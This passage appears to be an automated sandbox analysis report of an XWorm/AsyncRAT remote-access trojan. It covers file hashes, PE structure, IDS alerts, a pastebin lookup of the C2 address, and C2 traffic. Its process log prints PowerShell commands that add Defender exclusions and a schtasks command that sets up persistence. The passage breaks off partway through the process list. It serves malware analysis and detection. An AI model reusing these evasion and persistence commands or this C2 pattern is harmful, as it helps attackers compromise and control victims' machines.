                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqafyzdm.efn.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nepcs5ib.osd.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg4ta4de.fae.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ud0qsn4k.qe2.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uki5cg5d.wbr.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqqlgrcb.xlj.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):5.885722644983858
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:1bE8S5sN9S.exe
                                File size:60'416 bytes
                                MD5:f2a18b995a82e938ab6a067491aa0d79
                                SHA1:d437fca2f38d712bafae8c92169eec8934699e54
                                SHA256:8efa6f0711c60afd3e6cb29df2b740ee4d01b7f4290a223aa85c6f54fb3b9da5
                                SHA512:73db4ec0271045f3f2c40fa197cf6300d81f32e4ecdddf792b475c8234d997c8d9ddfd62f944f230d8929017dfd1f473fbf4470f3bf6c2e92a8606cd3fed6d56
                                SSDEEP:1536:CcG/DG/fDG+wopontVm+4ys9bFKR4F+9E6ywbgOmXvkAq:CcGGfDG+wWoPm+4X9bFKac/0Omfbq
                                TLSH:AC437C4CBBE40535E5FF5FB808B62241DB79A6934813D72F68DA41CA2713ADCCA413E9
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a".g............................>.... ........@.. .......................@............@................................

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x40fe3e
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x67002261 [Fri Oct 4 17:14:09 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xfde80x53.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x63e.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xde440xe000b56ed395bfd8e677e0136e0c5595d5aaFalse0.5802176339285714data5.997672273520919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x100000x63e0x8008b367cd4c8390611e6d4db7615fcc8f2False0.345703125data3.577723093958768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x120000xc0x200509b6fc80cb53abf2dea5b906aa6f298False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0x100a00x3b4data0.42616033755274263
                                RT_MANIFEST0x104540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-31T19:49:21.972439+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549710TCP
                                2024-10-31T19:50:01.056065+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549939TCP
                                2024-10-31T19:51:11.371806+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549984108.177.127.1476040TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 31, 2024 19:50:09.252789021 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:09.252825975 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:09.252922058 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:09.261105061 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:09.261121988 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:09.898263931 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:09.898444891 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:09.900476933 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:09.900485039 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:09.900768042 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:09.945846081 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:09.987330914 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:10.574357033 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:10.574446917 CET44349977104.20.4.235192.168.2.5
                                Oct 31, 2024 19:50:10.574548960 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:10.582056046 CET49977443192.168.2.5104.20.4.235
                                Oct 31, 2024 19:50:10.745224953 CET499786040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:10.751018047 CET604049978108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:10.753386021 CET499786040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:10.869883060 CET499786040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:10.875235081 CET604049978108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:19.243324041 CET604049978108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:19.243428946 CET499786040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:19.340795040 CET499786040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:19.342008114 CET499796040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:19.350099087 CET604049978108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:19.351372004 CET604049979108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:19.351541042 CET499796040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:19.371431112 CET499796040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:19.376931906 CET604049979108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:27.837215900 CET604049979108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:27.837352037 CET499796040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:30.043840885 CET499796040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:30.045156002 CET499806040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:30.048757076 CET604049979108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:30.050039053 CET604049980108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:30.050127983 CET499806040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:30.066766024 CET499806040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:30.071738958 CET604049980108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:38.541048050 CET604049980108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:38.541157007 CET499806040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:40.309451103 CET499806040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:40.310524940 CET499816040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:40.314481974 CET604049980108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:40.315511942 CET604049981108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:40.315592051 CET499816040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:40.330626011 CET499816040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:40.335541010 CET604049981108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:48.796989918 CET604049981108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:48.797076941 CET499816040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:51.227926970 CET499816040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:51.230487108 CET499826040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:51.232784033 CET604049981108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:51.235336065 CET604049982108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:51.235495090 CET499826040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:51.557626963 CET499826040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:50:51.562535048 CET604049982108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:59.723511934 CET604049982108.177.127.147192.168.2.5
                                Oct 31, 2024 19:50:59.723705053 CET499826040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:00.153371096 CET499826040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:00.154505014 CET499836040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:00.158551931 CET604049982108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:00.159473896 CET604049983108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:00.159579992 CET499836040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:00.176934958 CET499836040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:00.182300091 CET604049983108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:08.644865990 CET604049983108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:08.645145893 CET499836040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:08.888916016 CET499836040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:08.888916016 CET499846040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:08.893841982 CET604049983108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:08.893857956 CET604049984108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:08.893995047 CET499846040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:08.910187960 CET499846040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:08.915127039 CET604049984108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:11.371805906 CET499846040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:11.668790102 CET499846040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:12.278129101 CET499846040192.168.2.5108.177.127.147
                                Oct 31, 2024 19:51:12.449991941 CET604049984108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:12.450028896 CET604049984108.177.127.147192.168.2.5
                                Oct 31, 2024 19:51:12.450519085 CET604049984108.177.127.147192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 31, 2024 19:50:09.239926100 CET5257253192.168.2.51.1.1.1
                                Oct 31, 2024 19:50:09.247742891 CET53525721.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 31, 2024 19:50:09.239926100 CET192.168.2.51.1.1.10x4716Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 31, 2024 19:50:09.247742891 CET1.1.1.1192.168.2.50x4716No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                Oct 31, 2024 19:50:09.247742891 CET1.1.1.1192.168.2.50x4716No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                Oct 31, 2024 19:50:09.247742891 CET1.1.1.1192.168.2.50x4716No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • pastebin.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549977104.20.4.2354435580C:\Users\user\Desktop\1bE8S5sN9S.exe
                                TimestampBytes transferredDirectionData
                                2024-10-31 18:50:09 UTC74OUTGET /raw/QUwdrCNg HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-31 18:50:10 UTC388INHTTP/1.1 200 OK
                                Date: Thu, 31 Oct 2024 18:50:10 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: MISS
                                Last-Modified: Thu, 31 Oct 2024 18:50:10 GMT
                                Server: cloudflare
                                CF-RAY: 8db5d44498712c96-DFW
                                2024-10-31 18:50:10 UTC26INData Raw: 31 34 0d 0a 31 30 38 2e 31 37 37 2e 31 32 37 2e 31 34 37 3a 36 30 34 30 0d 0a
                                Data Ascii: 14108.177.127.147:6040
                                2024-10-31 18:50:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:14:49:02
                                Start date:31/10/2024
                                Path:C:\Users\user\Desktop\1bE8S5sN9S.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\1bE8S5sN9S.exe"
                                Imagebase:0x200000
                                File size:60'416 bytes
                                MD5 hash:F2A18B995A82E938AB6A067491AA0D79
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:2
                                Start time:14:49:08
                                Start date:31/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:14:49:08
                                Start date:31/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:14:49:16
                                Start date:31/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1bE8S5sN9S.exe'
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:14:49:16
                                Start date:31/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:14:49:27
                                Start date:31/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
                                Imagebase:0x7ff6068e0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:14:49:27
                                Start date:31/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:11
                                Start time:14:49:44
                                Start date:31/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:14:49:44
                                Start date:31/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:14:50:08
                                Start date:31/10/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"
                                Imagebase:0x7ff760170000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:14:50:08
                                Start date:31/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:15
                                Start time:14:50:09
                                Start date:31/10/2024
                                Path:C:\ProgramData\winlogon.exe
                                Wow64 process (32bit):false
                                Commandline:C:\ProgramData\winlogon.exe
                                Imagebase:0x400000
                                File size:60'416 bytes
                                MD5 hash:F2A18B995A82E938AB6A067491AA0D79
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\winlogon.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\winlogon.exe, Author: ditekSHen
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 82%, ReversingLabs
                                Has exited:true

                                General

                                Target ID:16
                                Start time:14:51:01
                                Start date:31/10/2024
                                Path:C:\ProgramData\winlogon.exe
